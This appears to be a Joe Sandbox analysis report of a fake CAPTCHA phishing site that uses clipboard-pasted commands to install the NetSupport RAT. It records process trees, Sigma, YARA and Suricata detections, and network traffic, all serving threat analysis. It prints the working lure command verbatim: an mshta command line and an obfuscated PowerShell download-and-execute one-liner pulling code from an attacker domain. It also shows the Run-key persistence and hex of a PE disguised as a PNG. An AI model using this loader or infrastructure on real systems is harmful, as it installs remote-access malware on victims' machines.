Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://inspyrehomedesign.com

Overview

General Information

Sample URL:https://inspyrehomedesign.com
Analysis ID:1544091
Infos:

Detection

NetSupport RAT
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Detect drive by download via clipboard copy & paste
Sigma detected: Powershell drops NetSupport RAT client
Downloads files with wrong headers with respect to MIME Content-Type
Powershell drops PE file
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Uses ipconfig to lookup or modify the Windows network settings
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Downloads executable code via HTTP
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTML page contains hidden javascript code
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Yara detected Keylogger Generic
Yara detected NetSupport remote tool

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 2200 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6808 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1932,i,1389659103431353991,14239789297215487366,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6384 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://inspyrehomedesign.com" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • svchost.exe (PID: 6584 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • notepad.exe (PID: 7676 cmdline: "C:\Windows\system32\notepad.exe" MD5: 27F71B12CB585541885A31BE22F61C83)
  • mshta.exe (PID: 7816 cmdline: "C:\Windows\system32\mshta.exe" https://inspyrehomedesign.com/Ray-verify.html # ? ''Verify you are human - Ray Verification ID: 7940'' MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
    • powershell.exe (PID: 7916 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://traversecityspringbreak.com/o/o.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • ipconfig.exe (PID: 8088 cmdline: "C:\Windows\system32\ipconfig.exe" /flushdns MD5: 62F170FB07FDBB79CEB7147101406EB8)
      • cmd.exe (PID: 8112 cmdline: "C:\Windows\system32\cmd.exe" /c attrib +h C:\Users\user\AppData\Roaming\fzxYFa MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • attrib.exe (PID: 8132 cmdline: attrib +h C:\Users\user\AppData\Roaming\fzxYFa MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • client32.exe (PID: 7056 cmdline: "C:\Users\user\AppData\Roaming\fzxYFa\client32.exe" MD5: EE75B57B9300AAB96530503BFAE8A2F2)
  • cleanup
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\fzxYFa\pcicapi.dllJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
    C:\Users\user\AppData\Roaming\fzxYFa\PCICHEK.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
      C:\Users\user\AppData\Roaming\fzxYFa\HTCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
        C:\Users\user\AppData\Roaming\fzxYFa\PCICHEK.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
          C:\Users\user\AppData\Roaming\fzxYFa\pcicapi.dllJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
            Click to see the 19 entries
            SourceRuleDescriptionAuthorStrings
            00000014.00000000.1965756689.0000000000C92000.00000002.00000001.01000000.0000000F.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
              00000014.00000000.1965756689.0000000000C9F000.00000002.00000001.01000000.0000000F.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                00000014.00000002.2448322390.00000000111E1000.00000004.00000001.01000000.00000010.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                  00000014.00000002.2452337162.000000006C620000.00000002.00000001.01000000.00000014.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                    00000014.00000002.2431973986.0000000000C92000.00000002.00000001.01000000.0000000F.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                      Click to see the 3 entries

                      System Summary

                      barindex
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://traversecityspringbreak.com/o/o.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://traversecityspringbreak.com/o/o.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X , CommandLine|base64offset|contains: ", Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\mshta.exe" https://inspyrehomedesign.com/Ray-verify.html # ? ''Verify you are human - Ray Verification ID: 7940'', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 7816, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://traversecityspringbreak.com/o/o.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X , ProcessId: 7916, ProcessName: powershell.exe
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\fzxYFa\client32.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7916, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft
                      Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7916, TargetFilename: C:\Users\user\AppData\Roaming\fzxYFa\HTCTL32.DLL
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://traversecityspringbreak.com/o/o.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://traversecityspringbreak.com/o/o.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X , CommandLine|base64offset|contains: ", Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\mshta.exe" https://inspyrehomedesign.com/Ray-verify.html # ? ''Verify you are human - Ray Verification ID: 7940'', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 7816, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://traversecityspringbreak.com/o/o.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X , ProcessId: 7916, ProcessName: powershell.exe
                      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 656, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6584, ProcessName: svchost.exe

                      Remote Access Functionality

                      barindex
                      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7916, TargetFilename: C:\Users\user\AppData\Roaming\fzxYFa\NSM.LIC
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-28T19:51:51.960037+010028032742Potentially Bad Traffic192.168.2.1649717166.1.160.21180TCP
                      2024-10-28T19:51:51.960037+010028032742Potentially Bad Traffic192.168.2.1649717166.1.160.21180TCP
                      2024-10-28T19:51:52.180340+010028032742Potentially Bad Traffic192.168.2.1649717166.1.160.21180TCP
                      2024-10-28T19:51:52.180340+010028032742Potentially Bad Traffic192.168.2.1649717166.1.160.21180TCP
                      2024-10-28T19:51:54.496668+010028032742Potentially Bad Traffic192.168.2.1649717166.1.160.21180TCP
                      2024-10-28T19:51:54.496668+010028032742Potentially Bad Traffic192.168.2.1649717166.1.160.21180TCP
                      2024-10-28T19:52:01.359070+010028032742Potentially Bad Traffic192.168.2.1649717166.1.160.21180TCP
                      2024-10-28T19:52:01.359070+010028032742Potentially Bad Traffic192.168.2.1649717166.1.160.21180TCP
                      2024-10-28T19:52:01.517999+010028032742Potentially Bad Traffic192.168.2.1649717166.1.160.21180TCP
                      2024-10-28T19:52:01.517999+010028032742Potentially Bad Traffic192.168.2.1649717166.1.160.21180TCP
                      2024-10-28T19:52:02.264198+010028032742Potentially Bad Traffic192.168.2.1649717166.1.160.21180TCP
                      2024-10-28T19:52:02.264198+010028032742Potentially Bad Traffic192.168.2.1649717166.1.160.21180TCP
                      2024-10-28T19:52:02.426763+010028032742Potentially Bad Traffic192.168.2.1649717166.1.160.21180TCP
                      2024-10-28T19:52:02.426763+010028032742Potentially Bad Traffic192.168.2.1649717166.1.160.21180TCP
                      2024-10-28T19:52:03.536692+010028032742Potentially Bad Traffic192.168.2.1649717166.1.160.21180TCP
                      2024-10-28T19:52:03.536692+010028032742Potentially Bad Traffic192.168.2.1649717166.1.160.21180TCP
                      2024-10-28T19:52:04.527451+010028032742Potentially Bad Traffic192.168.2.1649720166.1.160.21180TCP
                      2024-10-28T19:52:04.527451+010028032742Potentially Bad Traffic192.168.2.1649720166.1.160.21180TCP
                      2024-10-28T19:52:10.574402+010028032742Potentially Bad Traffic192.168.2.1649722166.1.160.21180TCP
                      2024-10-28T19:52:10.574402+010028032742Potentially Bad Traffic192.168.2.1649722166.1.160.21180TCP
                      2024-10-28T19:52:11.040795+010028032742Potentially Bad Traffic192.168.2.1649722166.1.160.21180TCP
                      2024-10-28T19:52:11.040795+010028032742Potentially Bad Traffic192.168.2.1649722166.1.160.21180TCP
                      2024-10-28T19:52:11.790064+010028032742Potentially Bad Traffic192.168.2.1649722166.1.160.21180TCP
                      2024-10-28T19:52:11.790064+010028032742Potentially Bad Traffic192.168.2.1649722166.1.160.21180TCP

                      Click to jump to signature section

                      Show All Signature Results

                      Phishing

                      barindex
                      Source: https://inspyrehomedesign.com/LLM: Score: 9 Reasons: The brand 'CloudFlare' is well-known and typically associated with the domain 'cloudflare.com'., The provided URL 'inspyrehomedesign.com' does not match the legitimate domain for CloudFlare., The URL does not contain any elements that suggest a direct association with CloudFlare., The URL appears to be unrelated to the CloudFlare brand, suggesting a potential phishing attempt., The presence of generic input fields labeled as 'u, n, k, n, o, w, n' is suspicious and not typical for a legitimate CloudFlare page. DOM: 1.0.pages.csv
                      Source: https://inspyrehomedesign.com/HTTP Parser: Base64 decoded: <svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" fill="none"><path fill="#fc574a" d="M16 3a13 13 0 1 0 13 13A13.015 13.015 0 0 0 16 3m0 24a11 11 0 1 1 11-11 11.01 11.01 0 0 1-11 11"/><path fill="#fc574a" d="M17.038 18.615H14.87L14.563 9.5h2....
                      Source: https://inspyrehomedesign.com/HTTP Parser: No favicon
                      Source: https://inspyrehomedesign.com/HTTP Parser: No favicon
                      Source: C:\Users\user\AppData\Roaming\fzxYFa\client32.exeFile opened: C:\Users\user\AppData\Roaming\fzxYFa\MSVCR100.dll
                      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49713 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49714 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.16:49715 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 166.1.160.75:443 -> 192.168.2.16:49716 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49718 version: TLS 1.2

                      Networking

                      barindex
                      Source: httpImage file has PE prefix: HTTP/1.1 200 OK Server: nginx/1.26.2 Date: Mon, 28 Oct 2024 18:52:03 GMT Content-Type: image/png Content-Length: 18808 Last-Modified: Mon, 21 Oct 2024 07:35:56 GMT Connection: keep-alive ETag: "6716045c-4978" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 73 76 0a bb 37 17 64 e8 37 17 64 e8 37 17 64 e8 2c 8a f8 e8 35 17 64 e8 2c 8a ce e8 34 17 64 e8 3e 6f f7 e8 30 17 64 e8 37 17 65 e8 0f 17 64 e8 2c 8a ca e8 33 17 64 e8 2c 8a ff e8 36 17 64 e8 2c 8a fe e8 36 17 64 e8 2c 8a f9 e8 36 17 64 e8 52 69 63 68 37 17 64 e8 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 66 88 bb 55 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0a 00 00 06 00 00 00 16 00 00 00 00 00 00 a0 10 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 00 00 00 04 00 00 b8 de 00 00 02 00 40 05 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 22 00 00 61 00 00 00 b8 20 00 00 50 00 00 00 00 40 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 20 00 00 78 29 00 00 00 50 00 00 84 00 00 00 40 20 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 04 00 00 00 10 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 1b 03 00 00 00 20 00 00 00 04 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 8c 04 00 00 00 30 00 00 00 02 00 00 00 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 ec 0d 00 00 00 40 00 00 00 0e 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 01 00 00 00 50 00 00 00 02 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.26.2Date: Mon, 28 Oct 2024 18:52:03 GMTContent-Type: image/pngContent-Length: 18808Last-Modified: Mon, 21 Oct 2024 07:35:56 GMTConnection: keep-aliveETag: "6716045c-4978"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 73 76 0a bb 37 17 64 e8 37 17 64 e8 37 17 64 e8 2c 8a f8 e8 35 17 64 e8 2c 8a ce e8 34 17 64 e8 3e 6f f7 e8 30 17 64 e8 37 17 65 e8 0f 17 64 e8 2c 8a ca e8 33 17 64 e8 2c 8a ff e8 36 17 64 e8 2c 8a fe e8 36 17 64 e8 2c 8a f9 e8 36 17 64 e8 52 69 63 68 37 17 64 e8 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 66 88 bb 55 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0a 00 00 06 00 00 00 16 00 00 00 00 00 00 a0 10 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 00 00 00 04 00 00 b8 de 00 00 02 00 40 05 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 22 00 00 61 00 00 00 b8 20 00 00 50 00 00 00 00 40 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 20 00 00 78 29 00 00 00 50 00 00 84 00 00 00 40 20 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 04 00 00 00 10 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 1b 03 00 00 00 20 00 00 00 04 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 8c 04 00 00 00 30 00 00 00 02 00 00 00 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 ec 0d 00 00 00 40 00 00 00 0e 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 01 00 00 00 50 00 00 00 02 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: GET /o/o.png HTTP/1.1Host: traversecityspringbreak.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.16:49717 -> 166.1.160.211:80
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.16:49720 -> 166.1.160.211:80
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.16:49722 -> 166.1.160.211:80
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
                      Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
                      Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
                      Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
                      Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
                      Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
                      Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
                      Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
                      Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
                      Source: global trafficHTTP traffic detected: GET /o/o.png HTTP/1.1Host: traversecityspringbreak.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /o/1.png HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: traversecityspringbreak.com
                      Source: global trafficHTTP traffic detected: GET /o/2.png HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: traversecityspringbreak.com
                      Source: global trafficHTTP traffic detected: GET /o/3.png HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: traversecityspringbreak.com
                      Source: global trafficHTTP traffic detected: GET /o/4.png HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: traversecityspringbreak.com
                      Source: global trafficHTTP traffic detected: GET /o/5.png HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: traversecityspringbreak.com
                      Source: global trafficHTTP traffic detected: GET /o/6.png HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: traversecityspringbreak.com
                      Source: global trafficHTTP traffic detected: GET /o/7.png HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: traversecityspringbreak.com
                      Source: global trafficHTTP traffic detected: GET /o/8.png HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: traversecityspringbreak.com
                      Source: global trafficHTTP traffic detected: GET /o/9.png HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: traversecityspringbreak.com
                      Source: global trafficHTTP traffic detected: GET /o/10.png HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: traversecityspringbreak.com
                      Source: global trafficHTTP traffic detected: GET /o/11.png HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: traversecityspringbreak.com
                      Source: global trafficHTTP traffic detected: GET /o/12.png HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: traversecityspringbreak.com
                      Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                      Source: global trafficDNS traffic detected: DNS query: inspyrehomedesign.com
                      Source: global trafficDNS traffic detected: DNS query: use.fontawesome.com
                      Source: global trafficDNS traffic detected: DNS query: i.ibb.co
                      Source: global trafficDNS traffic detected: DNS query: www.google.com
